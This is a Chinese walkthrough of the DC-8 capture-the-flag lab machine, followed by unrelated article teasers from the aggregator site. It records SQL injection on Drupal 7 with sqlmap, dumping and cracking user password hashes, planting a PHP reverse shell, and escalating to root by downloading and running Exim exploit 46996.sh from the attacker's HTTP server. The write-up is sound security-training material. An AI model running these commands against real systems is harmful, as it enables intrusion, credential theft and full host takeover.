DC-8靶机渗透详细流程

信息收集:

1.存活扫描:

arp-scan -I eth0 -l

└─# arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:dd:ee:6a, IPv4: 192.168.10.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1    00:50:56:c0:00:08       (Unknown)
192.168.10.2    00:50:56:e5:b1:08       (Unknown)
192.168.10.131 //靶机 00:0c:29:5b:e7:9f       (Unknown)
192.168.10.254  00:50:56:e0:e8:cc       (Unknown)

2.端口扫描:

nmap -sS -p- 192.168.10.131

nmap -sT -p- 192.168.149.213
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:5B:E7:9F (VMware)

3.服务扫描:

nmap -sVC -p 80,22 -O --Version-all 192.168.10.131

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
|   256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_  256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open  http    Apache httpd
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to DC-8 | DC-8
|_http-server-header: Apache
|_http-generator: Drupal 7 (http://drupal.org)
MAC Address: 00:0C:29:5B:E7:9F (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web部分:

发现作者挺喜欢 Drupal 的。

CMS:Drupal 7

漏洞发现:

这里发现 sql注入点:

SQL注入:

sqlmap一把梭:

爆库:

sqlmap -u http://192.168.10.131/?nid=2 --batc --dbs

[20:32:22] [INFO] fetching database names
[20:32:22] [INFO] retrieved: 'd7db'
[20:32:22] [INFO] retrieved: 'information_schema'
available databases [2]:                                                                                               
[*] d7db
[*] information_schema

爆表:

sqlmap -u http://192.168.10.131/?nid=2 --batc -D d7db --tables

Database: d7db                                                                                                                        
[88 tables]
+-----------------------------+
| block                       |
| cache                       |
| filter                      |
| history                     |
| role                        |
| system                      |
| actions                     |
| authmap                     |
| batch                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_views                 |
| cache_views_data            |
| ckeditor_input_format       |
| ckeditor_settings           |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter_format               |
| flood                       |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| site_messages_table         |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
| webform                     |
| webform_component           |
| webform_conditional         |
| webform_conditional_actions |
| webform_conditional_rules   |
| webform_emails              |
| webform_last_download       |
| webform_roles               |
| webform_submissions         |
| webform_submitted_data      |
+-----------------------------+

爆字段:

sqlmap -u http://192.168.10.131/?nid=2 --batc -D d7db -T users -C uid,name,pass --dump

Database: d7db                                                                                                                        
Table: users
[16 columns]
+------------------+------------------+
| Column           | Type             |
+------------------+------------------+
| data             | longblob         |
| language         | varchar(12)      |
| name             | varchar(60)      |
| status           | tinyint(4)       |
| access           | int(11)          |
| created          | int(11)          |
| init             | varchar(254)     |
| login            | int(11)          |
| mail             | varchar(254)     |
| pass             | varchar(128)     |
| picture          | int(11)          |
| signature        | varchar(255)     |
| signature_format | varchar(255)     |
| theme            | varchar(255)     |
| timezone         | varchar(32)      |
| uid              | int(10) unsigned |
+------------------+------------------+
----------------------------------------------------------------
Database: d7db                                                                                                                        
Table: users
[3 entries]
+-----+---------+---------------------------------------------------------+
| uid | name    | pass                                                    |
+-----+---------+---------------------------------------------------------+
| 0   | <blank> | <blank>                                                 |
| 1   | admin   | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| 2   | john    | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+-----+---------+---------------------------------------------------------+

John:

破解账密:

这里只破解出来了 john的密码。

john/turtle

后台登录:

dirb 目录扫描:

发现登录页面:

成功登录:

Getshell:

找到写php代码的地方,写入反弹shell,记得下面的框选php代码。

提权:

尝试SUID提权,和提权脚本

www-data@dc-8:/var/www/html$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4   //这个
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount
www-data@dc-8:/var/www/html$ exim4 --version
exim4 --version
Exim version 4.89 #2 built 14-Jun-2017 05:03:07
-------------------------------------
└─# searchsploit exim 4
--------------------------------------------------------------- ---------------------------------Exploit Title                                                 |  Path
--------------------------------------------------------------- ---------------------------------
Dovecot with Exim - 'sender_address' Remote Command Execution  | linux/remote/25297.txt
Exim - 'GHOST' glibc gethostbyname Buffer Overflow (Metasploit | linux/remote/36421.rb
Exim - 'perl_startup' Local Privilege Escalation (Metasploit)  | linux/local/39702.rb
Exim - 'sender_address' Remote Code Execution                  | linux/remote/25970.py
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation  | linux/local/40054.c
Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow          | linux/local/756.c
Exim 4.41 - 'dns_build_reverse' Local Read Emails              | linux/local/1009.c
Exim 4.42 - Local Privilege Escalation                         | linux/local/796.sh
Exim 4.43 - 'auth_spa_server()' Remote                         | linux/remote/812.c
Exim 4.63 - Remote Command Execution                           | linux/remote/15725.pl
Exim 4.84-3 - Local Privilege Escalation                       | linux/local/39535.sh
Exim 4.87 - 4.91 - Local Privilege Escalation    //这个              | linux/local/46996.sh
Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)     | linux/local/47307.rb
Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)     | linux/local/47307.rb
Exim 4.87 < 4.91 - (Local / Remote) Command Execution          | linux/remote/46974.txt
Exim 4.89 - 'BDAT' Denial of Service                           | multiple/dos/43184.txt
exim 4.90 - Remote Code Execution                              | linux/remote/45671.py
Exim < 4.86.2 - Local Privilege Escalation                     | linux/local/39549.txt
Exim < 4.90.1 - 'base64d' Remote Code Execution                | linux/remote/44571.py
Exim ESMTP 4.80 - glibc gethostbyname Denial of Service        | linux/dos/35951.py
Exim Internet Mailer 3.35/3.36/4.10 - Format String            | linux/local/22066.c
Exim Sender 3.35 - Verification Remote Stack Buffer Overrun    | linux/remote/24093.c
Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Me | linux/remote/16925.rb
MPlayer 0.9/1.0 - Remote HTTP Header Buffer Overflow           | linux/dos/23896.txt
OpenBSD 3.3 - 'Semget()' Integer Overflow (1)                  | openbsd/local/23046.c
OpenBSD 3.3 - 'Semget()' Integer Overflow (2)                  | openbsd/local/23047.c
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution       | php/webapps/42221.py
--------------------------------------------------------------- ----------------------

看看脚本内容:使用方法

在当前目录开启http服务,靶机下载并执行:

kali:python3 -m http.server 7723
靶机:cd /tmpwget http://192.168.10.129:7723/46996.shchmod 777 *./46996.sh -m netcat

康康flag:

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/459473.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

P2957

题目描述 The cows enjoy mooing at the barn because their moos echo back, although sometimes not completely. Bessie, ever the excellent secretary, has been recording the exact wording of the moo as it goes out and returns. She is curious as to just how mu…

电子电器架构 —— 网关测试脚本分析

电子电器架构 —— 网关测试 我是穿拖鞋的汉子,魔都中坚持长期主义的汽车电子工程师(Wechat:gongkenan2013)。 老规矩,分享一段喜欢的文字,避免自己成为高知识低文化的工程师: 屏蔽力是信息过载时代一个人的特殊竞争力,任何 消耗你的人和事,多看一眼都是你的不对。非…

《幻兽帕鲁》攻略:0基础入门及游戏基础操作 幻兽帕鲁基础设施 幻兽帕鲁基础攻击力 Mac苹果电脑玩幻兽帕鲁 幻兽帕鲁加班加点

今天就跟大家聊聊《幻兽帕鲁》攻略&#xff1a;0基础入门及游戏基础操作。 如果想在苹果电脑玩《幻兽帕鲁》记得安装CrossOver哦。 以下纯干货&#xff1a; CrossOver正版安装包&#xff08;免费试用&#xff09;&#xff1a;https://souurl.cn/Y1gDao 一、基础操作 二、界面…

Docker容器配置和资源限制

​ 一、Docker容器配置进阶 1、容器的自动重启 Docker提供重启策略控制容器退出时或Docker重启时是否自动启动该容器。 容器默认不支持自动重启&#xff0c;要使用 --restart 选项指定重启策略。 [rootlocalhost ~]# docker run --help--restart string Re…

[设计模式Java实现附plantuml源码~行为型]请求的链式处理——职责链模式

前言&#xff1a; 为什么之前写过Golang 版的设计模式&#xff0c;还在重新写Java 版&#xff1f; 答&#xff1a;因为对于我而言&#xff0c;当然也希望对正在学习的大伙有帮助。Java作为一门纯面向对象的语言&#xff0c;更适合用于学习设计模式。 为什么类图要附上uml 因为很…

单片机学习笔记---LED点阵屏的工作原理

目录 LED点阵屏分类 LED点阵屏显示原理 74HC595的介绍 一片74HC595的工作原理 多片级联工作原理 总结 LED点阵屏由若干个独立的LED组成&#xff0c;LED以矩阵的形式排列&#xff0c;以灯珠亮灭来显示文字、图片、视频等。LED点阵屏广泛应用于各种公共场合&#xff0c;如汽…

【操作系统】MacOS虚拟内存统计指标

目录 命令及其结果 参数解读 有趣的实验 在 macOS 系统中&#xff0c;虚拟内存统计指标提供了对系统内存使用情况和虚拟内存操作的重要洞察。通过分析这些指标&#xff0c;我们可以更好地了解系统的性能状况和内存管理情况。 命令及其结果 >>> vm_stat Mach Virtu…

SERVLET线程模型

1. SERVLET线程模型 Servlet规范定义了两种线程模型来阐明Web容器应该如何在多线程环境中处理servlet。第一种模型称为多线程模型,默认在此模型内执行所有servlet。在此模型中,每次客户机向servlet发送请求时Web容器都启动一个新线程。这意味着可能有多个线程同时访问servle…

ansible shell模块 可以用来使用shell 命令 支持管道符 shell 模块和 command 模块的区别

这里写目录标题 说明shell模块用法shell 模块和 command 模块的区别 说明 shell模块可以在远程主机上调用shell解释器运行命令&#xff0c;支持shell的各种功能&#xff0c;例如管道等 shell模块用法 ansible slave -m shell -a cat /etc/passwd | grep root # 可以使用管道…

【typescript】特殊符号用法(?:)(??)(?.)(!)(!!)

一. 问号冒号&#xff08;?:&#xff09; 1.可以作为对象类型的可选属性&#xff0c;如&#xff1a; interface Person{name : string;age?: number; }const person1 : Person {name:"zien"} const person2 : Person {name:"sad", age:18} console.l…

使用Pillow来生成简单的红包封面

Pillow库&#xff08;Python Imaging Library的后继&#xff09;是一个强大而灵活的图像处理库&#xff0c;适用于Python。Pillow 库&#xff08;有时也称 PIL 库&#xff09; 是 Python 图像处理的基础库&#xff0c;它是一个免费开源的第三方库&#xff0c;由一群 Python 社区…

泰克示波器——TBS2000系列界面整体介绍

目录 1.1 通道区域面板标识1.2 示波器测试输出&#xff08;检测探针与设置的好坏&#xff09;1.3 面板其他快捷按钮1.4 波器整体界面 1.1 通道区域面板标识 在通道面板的下方标识有示波器的通道属性以及参数值&#xff0c;如我使用的型号为“TBS2104X”的示波器&#xff0c;面…